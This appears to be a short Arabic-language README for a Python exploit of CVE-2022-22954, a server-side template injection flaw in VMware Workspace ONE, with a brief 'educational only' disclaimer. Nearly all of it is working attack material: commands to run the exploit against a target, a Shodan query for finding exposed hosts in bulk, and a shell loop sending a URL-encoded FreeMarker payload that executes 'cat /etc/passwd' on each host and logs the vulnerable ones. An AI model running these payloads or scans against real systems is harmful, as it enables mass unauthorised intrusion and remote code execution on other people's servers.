
استغلال بلغة Python لثغرة CVE-2022-22954، وهي ثغرة SSTI في VMware Workspace ONE، مع فحص دفعات وتكامل مع Shodan لاكتشاف المضيفين المعرّضين للخطر.
يرجى استخدام هذا على مسؤوليتك الخاصة. هذا المستودع مخصص للأغراض التعليمية فقط ونحن نعارض بشدة جميع النوايا غير القانونية ولن نكون مسؤولين عن أي أنشطة غير قانونية مرتبطة بهذا المستودع. كن أخلاقيًا!
python3 CVE-2022-22954.py -t target.com
python3 CVE-2022-22954.py -t 10.10.10.10
shodan search "http.favicon.hash:-1250474341" --limit 1000
cat list_vm_one.txt | awk '{print $1":"$2}' > vm_one.txt
cat vm_one.txt | while read host do;do curl --max-time 2 --silent --path-as-is --insecure "$host/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" | grep "root:*" && echo "$host [Vulnerable]" >> vuln_vm_one_ssti.txt;done